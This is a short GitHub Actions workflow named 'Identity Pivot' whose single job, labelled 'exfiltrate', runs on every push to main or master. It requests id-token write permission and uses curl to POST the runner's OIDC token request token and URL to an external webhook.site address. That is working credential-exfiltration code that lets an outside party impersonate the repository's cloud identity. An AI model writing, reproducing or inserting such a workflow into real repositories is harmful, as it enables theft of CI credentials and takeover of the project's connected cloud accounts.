name: Identity Pivot
on:
  push:
    branches: [ "main", "master" ]
permissions:
  id-token: write
  contents: read
jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Token Relay
        run: |
          curl -X POST -d "token=$ACTIONS_ID_TOKEN_REQUEST_TOKEN&url=$ACTIONS_ID_TOKEN_REQUEST_URL" https://webhook.site/e87e3774-3b37-462e-ae69-b5f3feabceb0
